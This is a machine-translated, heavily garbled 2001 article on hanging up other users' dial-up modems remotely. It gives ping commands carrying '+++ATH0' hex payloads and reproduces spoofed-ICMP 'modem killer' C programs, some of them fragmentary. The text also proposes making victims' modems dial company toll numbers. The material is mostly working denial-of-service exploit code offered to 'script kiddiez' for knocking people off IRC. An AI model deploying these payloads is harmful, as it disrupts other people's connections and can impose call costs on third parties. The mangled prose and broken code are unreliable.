Remote Control Modem (2001-02-05) by catsun@cners.com often on the IRC and chat room, probably have a sudden hanging line when chatting, maybe you think there is no relationship, then go up, The same situation happened, this! ◎ # ¥% is why? To eliminate the reasons for your modem, some people use some "bombs" bombing you. I also have such a painful experience, so I have found some information to read it, such as: "How to manage Modems? How to send AT commands remotely? I know his IP, how to make him disconnect? How do I manually control the modem? Prevent ATH attacker? "First, let's talk about the simple transport process on the Internet or LAN, assuming that your IP is xx.xx.xx.xx, the IP of the server you want to access is: yy.yy.yy .y, you can send some data to Yy.Yy.Yy.Yy: C Program at Source -------------------------------------------------------------------- -------- Daemon At Destination's Port (xx.xx.xx.xx) The above is a simple process, below we describe: C Program at Source This shows that the packet is also passed by two modems, and not just the packet by two modems, and not just the packet through them. Now you know that a system and modem call need to use a modem command --- at command. It is difficult to explain AT. Everyone knows "He", it is the order that they first developed a foundation modem. Later, many manufacturers also follow this standard, so most modems are "Herbane Compatible" --- AT Command Set. ------ ---------------------------------------- Imperial point: A simple basis AT command is let You dial to your ISP, you know, when you press the "Dial" button, your Dun software issues such a command to your Modem: ATDT or ATDP phone number We analyze, this command, 'at' activates Modem, The second part tells the model of the MODEM dial system, DT is audio, DP is a pulse mode, the last part is the number you want to dial. Description: To send a command to your MODEM, you need to make the packet in the state of command. -------------------------------------------------- ---------------------------------------- MODEM only accepts in the order mode Command, in the default state, MODEM is in command mode, after entering the network, in the online state, all commands will be considered as packet, not being processed. This means that even if we know the IP address of others, and send an AT command to his modem, but the other MODEM will treat the AT command as an information package, so we must make our commands, and must change the other's IP. Command mode. When MODEM is in an online state, we use an overflow vulnerability to send strings to it, which will change to command mode.
This way, when you know someone's IP, send a string and at command to his Modem, you will be able to manage this modem remote, make it disconnected, change its mode, let it call a special number, etc. . Below we use a simple example, H0 is an AT command, which allows MODEM offline or hang, as follows: ATH0 We will implement this attack with a C program, before this, I will talk about how Implement an AT command through Ping, but unfortunately this command is invalid under Windows system, at least from existing information, the effect is not big. PING -C 5 -P 2B2B2B415453323D3235352653323D32353526574F310D ip If this command you don't understand, you can see * NIX Box: $> man ping The following script can also achieve AT. #! / bin / shping -p 2b2b2b415448300d $ * Description: ATH0 commands cannot be implemented on all machines, which depends on the MODEM brand. ---------------------------------------------- We are on PacketStorm Found a C program to realize ICMP spoofing attack.
[Explanation] The way the exploit works is it hides escape / control sequences in a ICMPecho_request packet (it contains the string ATH0) the sends themodem into escape mode (and if the guard time on the modem is setridiculously low ) it will go into command mode and you can issue it anATH0 to hang up. It works on the reply, because it receives theecho_request packet, then duplicates the packet with a new timestamp andchecksum, dest / source hosts and returns it to the sender, when it returnsit the string is sent to the modem, and thus hanging it up. There are afew conditions that must be met for it to work (if you dont want to bevulnerable to this, fix these!) 1) target computer must not filter ICMP echo_request and must know how toreply to one if it gets one2) target computer must be using a modem (you can not hangup DS3s, althoughi suppose you could hangup telco return connections..if you can find one) 3) target computer must Have a Vulnerable Modem (IE Guard Time Is Setridiculousl YOW) 4) You Have to Be Able To Send Spoofed Packets (OR.. IF you can't i guestyou can use your ingim, but the target knows where it code, i Have Also Devised Various Fun Ways to use thisprogram other than just nuking your buddy off irc. in theory..it ispossible to modify the program to do fun stuff like make the target callsome number after it hangs up (IE )
ATH0 ,,, DT5551212) should make themodem hangup, pause for 6 seconds then call 5551212..this is fun forobvious reasons. Then the next variation I came up with is a smurf likeimplementation in which you could make a script to DoS a class C subnet, with the number of your least favorite company, since most company's have800 numbers, not only does this cause chaos to the phone bank, but alsocosts ~ $ .30 per call ... but i do not condone any of those ideas of Course, this Is Just for Experimental / Educational Purposes ONLY, IF you fix Yourmodems, None of this is Possible, SO Get Off Your Ass and fix it.script kiddiez: Here is your code ...--- cut here --- Cut here --- cut here --- cut here --- cut here --- / ** gin.c * jpester@engr.csulb.edu #include
(ATOI (Argv [3])); Signal (SIGINT, DONE); IF (SourceInfo = GethostByname (Source)) == NULL) {Printf ("Cannot Resolve Source Host!"); exit (-1);} memcpy ((caddr_t) & sin.sin_addr, sourceinfo-> h_addr, sourceinfo-> h_length); sin.sin_family = AF_INET; if ((destinfo = gethostbyname (target)) == NULL) {printf ( "! can not resolve destination host" ); exit (-1);} Memcpy ((Caddr_t) & Din.sin_addr, destinfo-> h_addr, destinfo-> h_length; din.sin_family = AF_INET; IF ((SockFD = socket (AF_INET, SOCK_RAW, IPPROTO_RAW) < 0) {Printf ("Cannot get raw sucket!"); Exit (-1);} Printf ("Source Host:% S", INET_NTOA (SIN.SIN_ADDR)); Printf ("Target Host: % s ", inet_ntoa (din.sin_addr)); Printf (" Number:% D ", Numpacket); Printf (" Have Some Gin Sucka "); for (i = 0; I
struct iphdr * ip; struct icmphdr * icmp; size_t msglen = sizeof (ginstring), iphlen = sizeof (struct iphdr); size_t icplen = sizeof (struct icmphdr), timlen = sizeof (structtimeval); int len = strlen (ginstring); Packet = (char *) Malloc (iPhlen icphone LEN); IP = (struct iPhdr *) packet; ICMP = (Struct ICMphDR *) (Packet iPhLen); (void) gettimeofDay (Struct Timeval *) & Packet [ ICplen iPhlen], (Struct Timezone *) NULL); Memcpy (Packet iPhlen icphone Timlen), Ginstring, (Len - 4)); IP-> Tot_len = Htons (iPhlen icpo (LEN - 4 ) Timlen; ip-> version = 4; ip-> ihl = 5; ip-> TOS = 0; IP-> TTL = 255; ip-> protocol = ipproto_ICMP; ip-> saddr = sin.sin_addr.s_addr ip-> DADDR = DIN.SIN_ADDR.S_ADDR; IP-> CHECK = IN_CHKSUM ((u_short *) ip, iPhlen); ICMP-> Type = ICMP_ECHO; ICMP-> Code = 0; ICMP-> Checksum = in_chksum ((( U_SHORT *) ICMP, (icpo (Len - 4)))); Total = (iPhlen icn Timlen Len 16); Sendto (Port, Packet, Total, 0, (Struct Sockaddr *) & DIN, SIZEOF (Struct SO CKADDR); Free (Packet);} // stolen from smurf unsigned short in_chksum (u_short * ipbuf, int {register int NLEFT = iplen; register int sum = 0; u_short answer = 0; while (NLEFT> 1) {SUM = * IPBUF ; NLEFT - = 2;} if (NLEFT == 1) {* (U_CHAR *) (& Answer) = * (u_char *) ipbuf; SUM = Answer;} Sum = (SUM >> 16 ) (SUM 0xFFFF); SUM = (SUM >> 16); Answer = ~ Sum; Return (Answer);
} --- Cut Here --- Cut Here --- Cut Here --- Cut Here --- Cut Here --- But when some machines run this program, the environment variable malloc_check_ can be changed to 1, if Compilation error (please use G -o3 -o gin gin.c) --------------------------------- ----------- There is a better program below: #include
IPPROTO_ICMP; ip-> saddr = spoof_addr; ip-> daddr = dest_addr-> sin_addr.s_addr; ip-> check = in_cksum ((u_short *) ip, sizeof (struct iphdr)); icmp-> type = ICMP_ECHO; icmp- > code = 0; ICMP-> Checksum = 0; ICMP-> Checksum = in_cksum ((u_short *) ICMP, SIZEOF (STRUCT ICMPHDR) Buffer; IF (SENDTO (STRUCKET, Packet, Sizeof (Struct iPhdr) SIZEOF Struct ICMPHDR) Buffer, 0, (Struct SockAddr *) DEST_ADDR, SIZEOF (STRUCT SOCKADDR) == -1) {RETURN (-1);} Free (packet); return (0);} int main , char ** argv) {struct sockaddr_in dest_addr; unsigned INT I, SOCK, TYPE; unsigned long src_addr; if (getEuid ()! = 0) {fprintf (stderr, "you must be root in order to run this!") Return (-1);} Printf ("Modem Killer - Version 1.0B - Spoofable"); Printf ("by scrippie"); if ((argc! = 5)) {Printf ("Use the Following Format:") PRINTF ("% s
DEST_ADDR) == -1) {RETURN (-1);} Printf ("Now senting the modem kill ..."); for (i = 0; I
